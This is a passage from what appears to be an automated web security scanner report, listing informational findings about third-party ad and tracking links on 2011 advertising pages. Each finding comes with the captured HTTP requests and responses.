http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3Df19a8559-9ae6-44b1-ad9f-8f0dd44f76ad&mpt=f19a8559-9ae6-44b1-ad9f-8f0dd44f76ad&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOxSAMQ69SZS4SIQkkvQ0VZaq6dar.3b.Z_J5k.yMROrbwUmXfSArERdgVxhCaHN3NIkW_alI9OfURM_nMY6jOVvugNV3lZiW3ZesnkIbULA5U4PPeN7ACGVXj3x8DRRus%26redirectURL%3D

The response contains the following link to another domain:

http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOxSAMQ69SZS4SIQkkvQ0VZaq6dar.3b.Z_J5k.yMROrbwUmXfSArERdgVxhCaHN3NIkW_alI9OfURM_nMY6jOVvugNV3lZiW3ZesnkIbULA5U4PPeN7ACGVXj3x8DRRus&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=f19a8559-9ae6-44b1-ad9f-8f0dd44f76ad

Request

GET /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3Df19a8559-9ae6-44b1-ad9f-8f0dd44f76ad&mpt=f19a8559-9ae6-44b1-ad9f-8f0dd44f76ad&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOxSAMQ69SZS4SIQkkvQ0VZaq6dar.3b.Z_J5k.yMROrbwUmXfSArERdgVxhCaHN3NIkW_alI9OfURM_nMY6jOVvugNV3lZiW3ZesnkIbULA5U4PPeN7ACGVXj3x8DRRus%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:32 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:24:45 GMT
ETag: "82e9a3-fb0-4ac491a8ed140"
Accept-Ranges: bytes
Content-Length: 5258
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOxSAMQ69SZS4SIQkkvQ0VZaq6dar.3b.Z_J5k.yMROrbwUmXfSArERdgVxhCaHN3NIkW_alI9OfURM_nMY6jOVvugNV3lZiW3ZesnkIbULA5U4PPeN7ACGVXj3x8DRRus&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=f19a8559-9ae6-44b1-ad9f-8f0dd44f76ad" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.jpg" width="728" height="90" border="0" alt="">
...[SNIP]...

14.50. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-15.html

Issue detail

The page was loaded from a URL containing a query string:

http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html?cb=0.39881858555600047&keyword=smh/business_other

The response contains the following links to other domains:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46?mpt=4b1c2d40-76a1-493d-8cf6-6625bb9f7a98&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOwzAMQ68SaK4B62NZ6m3iBJmCbJ2K3r3UxPcAkl9SpfeWIa6vjVQgocpRxhCyxYec1tv0nZulni2Oy5u7jLXymnsG1bTKc0ifZfWTyIG0rgE04PO5b6ADGdXhvz_YKhsX%26redirectURL%3D
http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-46?mpt=4b1c2d40-76a1-493d-8cf6-6625bb9f7a98
http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOwzAMQ68SaK4B62NZ6m3iBJmCbJ2K3r3UxPcAkl9SpfeWIa6vjVQgocpRxhCyxYec1tv0nZulni2Oy5u7jLXymnsG1bTKc0ifZfWTyIG0rgE04PO5b6ADGdXhvz_YKhsX&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-46?mpt=4b1c2d40-76a1-493d-8cf6-6625bb9f7a98
http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.679912&creativeID=147856&message=eJwVjDsOwzAMQ68SaK4B62NZ6m3iBJmCbJ2K3r3UxPcAkl9SpfeWIa6vjVQgocpRxhCyxYec1tv0nZulni2Oy5u7jLXymnsG1bTKc0ifZfWTyIG0rgE04PO5b6ADGdXhvz_YKhsX&managed=false
http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment
http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01

Request

GET /a/7856/12590/22782-15.html?cb=0.39881858555600047&keyword=smh/business_other HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rdk2=0; ses2=12338^10&12590^5; rdk=7856/12590; rdk15=0; ses15=12338^7&12590^6

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:19:56 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:19:56 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588dd97f74c7a98e39cf2; expires=Wed, 07-Sep-2011 15:19:56 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^12&12590^12; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63603; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2940

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

<script type="text/javascript" src="http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46?mpt=4b1c2d40-76a1-493d-8cf6-6625bb9f7a98&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOwzAMQ68SaK4B62NZ6m3iBJmCbJ2K3r3UxPcAkl9SpfeWIa6vjVQgocpRxhCyxYec1tv0nZulni2Oy5u7jLXymnsG1bTKc0ifZfWTyIG0rgE04PO5b6ADGdXhvz_YKhsX%26redirectURL%3D">
</script>
<noscript>
<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOwzAMQ68SaK4B62NZ6m3iBJmCbJ2K3r3UxPcAkl9SpfeWIa6vjVQgocpRxhCyxYec1tv0nZulni2Oy5u7jLXymnsG1bTKc0ifZfWTyIG0rgE04PO5b6ADGdXhvz_YKhsX&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-46?mpt=4b1c2d40-76a1-493d-8cf6-6625bb9f7a98">
<img src="http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-46?mpt=4b1c2d40-76a1-493d-8cf6-6625bb9f7a98"
alt="Click Here" border="0">
</a>
</noscript>
<img height="1" border="0" width="1" alt="" style="display: none;" src="http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.679912&creativeID=147856&message=eJwVjDsOwzAMQ68SaK4B62NZ6m3iBJmCbJ2K3r3UxPcAkl9SpfeWIa6vjVQgocpRxhCyxYec1tv0nZulni2Oy5u7jLXymnsG1bTKc0ifZfWTyIG0rgE04PO5b6ADGdXhvz_YKhsX&managed=false"/>
<iframe src='http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9' width='1' height='1' frameborder='0' style='display: none;' scrolling='no' marginheight='0' marginwidth='0'></iframe><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...
</script>
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01" style="display: none;" border="0" height="1" width="1" alt=""/><DIV STYLE="height:0px; width:0px; overflow:hidden">
...[SNIP]...

14.51. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-15.html

Issue detail

The page was loaded from a URL containing a query string:

http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html?cb=0.39881858555600047&keyword=smh/business_other

The response contains the following links to other domains:

http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment
http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01
http://uac.advertising.com/wrapper/aceUAC.js

Request

Response

14.52. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-15.html

Issue detail

The page was loaded from a URL containing a query string:

http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html?cb=0.3839801487047225&keyword=smh/news_home

The response contains the following links to other domains:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46?mpt=1fd7d168-dd1e-413a-b4da-376f0e23c438&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOhTAMQ6.CMlOpqdM0cBsgMCE2JvTv_pPJ70m2PwJonRZrinkitBAD2NI4hPjy4axW3PkswtjKLr4VDL3q2XAIjHKa5dFbHWn5s0T2SKmwQAl83vsO1ECOatffH_YwG2M-%26redirectURL%3D
http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-46?mpt=1fd7d168-dd1e-413a-b4da-376f0e23c438
http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOhTAMQ6.CMlOpqdM0cBsgMCE2JvTv_pPJ70m2PwJonRZrinkitBAD2NI4hPjy4axW3PkswtjKLr4VDL3q2XAIjHKa5dFbHWn5s0T2SKmwQAl83vsO1ECOatffH_YwG2M-&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-46?mpt=1fd7d168-dd1e-413a-b4da-376f0e23c438
http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.619859&creativeID=147856&message=eJwVjDEOhTAMQ6.CMlOpqdM0cBsgMCE2JvTv_pPJ70m2PwJonRZrinkitBAD2NI4hPjy4axW3PkswtjKLr4VDL3q2XAIjHKa5dFbHWn5s0T2SKmwQAl83vsO1ECOatffH_YwG2M-&managed=false
http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment
http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01

Request

GET /a/7856/12590/22782-15.html?cb=0.3839801487047225&keyword=smh/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses15=12338^5&12590^4; csi2=3165011.js^2^1315404895^1315404918&3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rdk=7856/12590; rdk2=0; ses2=12338^7&12590^3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:36 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:18:36 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Wed, 07-Sep-2011 15:18:36 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^15&12590^36; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63683; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2940

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

<script type="text/javascript" src="http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46?mpt=1fd7d168-dd1e-413a-b4da-376f0e23c438&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOhTAMQ6.CMlOpqdM0cBsgMCE2JvTv_pPJ70m2PwJonRZrinkitBAD2NI4hPjy4axW3PkswtjKLr4VDL3q2XAIjHKa5dFbHWn5s0T2SKmwQAl83vsO1ECOatffH_YwG2M-%26redirectURL%3D">
</script>
<noscript>
<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOhTAMQ6.CMlOpqdM0cBsgMCE2JvTv_pPJ70m2PwJonRZrinkitBAD2NI4hPjy4axW3PkswtjKLr4VDL3q2XAIjHKa5dFbHWn5s0T2SKmwQAl83vsO1ECOatffH_YwG2M-&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-46?mpt=1fd7d168-dd1e-413a-b4da-376f0e23c438">
<img src="http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-46?mpt=1fd7d168-dd1e-413a-b4da-376f0e23c438"
alt="Click Here" border="0">
</a>
</noscript>
<img height="1" border="0" width="1" alt="" style="display: none;" src="http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.619859&creativeID=147856&message=eJwVjDEOhTAMQ6.CMlOpqdM0cBsgMCE2JvTv_pPJ70m2PwJonRZrinkitBAD2NI4hPjy4axW3PkswtjKLr4VDL3q2XAIjHKa5dFbHWn5s0T2SKmwQAl83vsO1ECOatffH_YwG2M-&managed=false"/>
<iframe src='http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9' width='1' height='1' frameborder='0' style='display: none;' scrolling='no' marginheight='0' marginwidth='0'></iframe><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...
</script>
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01" style="display: none;" border="0" height="1" width="1" alt=""/><DIV STYLE="height:0px; width:0px; overflow:hidden">
...[SNIP]...

14.53. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-15.html

Issue detail

The page was loaded from a URL containing a query string:

http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html?cb=0.3839801487047225&keyword=smh/news_home

The response contains the following links to other domains:

http://ad.turn.com/server/ads.js?pub=5766351&cch=5766918&code=5766930&l=300x250&aid=26655620&ahcid=1862304&bimpd=3ZT4qeVfW2eflo6i8tBht1ANErsXpVwuSH7n0sObSTpUlEwRZhuZ4bjitVSL3PEKAG0ttKWDZTDMsBahjtd3tL8wvAhJVp5vH1605NNaPKisUQt-lkDpGOXuXVonttiGHngq6py6H04rQhjgefP3Nx3fWMI7KhyrWqgJYhCiRbpUMYDNuG9lylmFGegZs3d4yEG8BP5dzjykSC6Ht6iJ2ZT02Ti1h452fwgpRY2wxLoyjF_nhB_W_gMlLwGpdcJ0jc-VyHDsmqPRZuYRzjE4syKkKuoUr6yeAaya3ZXMDZCx9FlG-X0121QtOdbOXWsLIJuM376NcyOPzY8jGqH6SRUs0jS9_-jXfuzQr6fBboc91ieMz2dxZVCTxS1_BULq-jvsmvErAWV3rDE5CAn1zuPqcSHXZ5esCGaTz5fv5OPKD4baNUh-M_tG5AeiOiff6yUix1UC5red8L7udmEJT_e_WusQSRWq7MSF1qPrE1vqAK8cHzvevpG_BntZvJrKQNANcX7Fy6CCGwL6zhvlrnHphu-UzfDCXoT5Q4N9hQAKBn1Qr-tiIVwRdaXoMXgVvfBz5xDsVEqchMpjM7fNhT-geEL0DD97bMApSU7DtEBTRfjwZrU1fReHz9W8rOsmbNGFVWiPguIu6HCsrR1QrL3wc-cQ7FRKnITKYzO3zYUIira0837MbrH9d2aRavVTHRHXzEnsfg0l8JPGS068nS84csyl6jUKywbUyFhc7AKjsZQyAQ6kVAwWSib4A4xD-KISKV43YFluqLKM9CWfBcXnC3HM0YzExa44peHG5dgwoaE3NXvnNuHwlpipNFPejP4V5j_ljOA1UvBfaz7YhH0lpriMl-1v60tkD4B8fShZA5xP-LKOGfmI9Q4im5wVtElbns2ZawQBFvd3CNlCyJsDWOZp1nMAuRgONm9vyA7avyVVNN0qUmepM37kGvs1&acp=A78467F56BDD69A9&rtbacid=15495ada94ce2156d70faee2b515d5baad9080fe
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment
http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01

Request

GET /a/7856/12590/22782-15.html?cb=0.3839801487047225&keyword=smh/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi2=3165011.js^1^1315404895^1315404895&3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses2=12338^6&12590^2; rdk=7725/12338; rdk15=0; ses15=12338^5&12590^3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:26 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:18:26 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Wed, 07-Sep-2011 15:18:26 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^13&12590^8; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63693; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2641

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<body>

<script src='http://ad.turn.com/server/ads.js?pub=5766351&cch=5766918&code=5766930&l=300x250&aid=26655620&ahcid=1862304&bimpd=3ZT4qeVfW2eflo6i8tBht1ANErsXpVwuSH7n0sObSTpUlEwRZhuZ4bjitVSL3PEKAG0ttKWDZTDMsBahjtd3tL8wvAhJVp5vH1605NNaPKisUQt-lkDpGOXuXVonttiGHngq6py6H04rQhjgefP3Nx3fWMI7KhyrWqgJYhCiRbpUMYDNuG9lylmFGegZs3d4yEG8BP5dzjykSC6Ht6iJ2ZT02Ti1h452fwgpRY2wxLoyjF_nhB_W_gMlLwGpdcJ0jc-VyHDsmqPRZuYRzjE4syKkKuoUr6yeAaya3ZXMDZCx9FlG-X0121QtOdbOXWsLIJuM376NcyOPzY8jGqH6SRUs0jS9_-jXfuzQr6fBboc91ieMz2dxZVCTxS1_BULq-jvsmvErAWV3rDE5CAn1zuPqcSHXZ5esCGaTz5fv5OPKD4baNUh-M_tG5AeiOiff6yUix1UC5red8L7udmEJT_e_WusQSRWq7MSF1qPrE1vqAK8cHzvevpG_BntZvJrKQNANcX7Fy6CCGwL6zhvlrnHphu-UzfDCXoT5Q4N9hQAKBn1Qr-tiIVwRdaXoMXgVvfBz5xDsVEqchMpjM7fNhT-geEL0DD97bMApSU7DtEBTRfjwZrU1fReHz9W8rOsmbNGFVWiPguIu6HCsrR1QrL3wc-cQ7FRKnITKYzO3zYUIira0837MbrH9d2aRavVTHRHXzEnsfg0l8JPGS068nS84csyl6jUKywbUyFhc7AKjsZQyAQ6kVAwWSib4A4xD-KISKV43YFluqLKM9CWfBcXnC3HM0YzExa44peHG5dgwoaE3NXvnNuHwlpipNFPejP4V5j_ljOA1UvBfaz7YhH0lpriMl-1v60tkD4B8fShZA5xP-LKOGfmI9Q4im5wVtElbns2ZawQBFvd3CNlCyJsDWOZp1nMAuRgONm9vyA7avyVVNN0qUmepM37kGvs1&acp=A78467F56BDD69A9&rtbacid=15495ada94ce2156d70faee2b515d5baad9080fe'></script><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...
</script>
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01" style="display: none;" border="0" height="1" width="1" alt=""/><DIV STYLE="height:0px; width:0px; overflow:hidden">
...[SNIP]...

14.54. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-15.html

Issue detail

The page was loaded from a URL containing a query string:

http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html?cb=0.03344764839857817&keyword=smh/businessinnovations_other

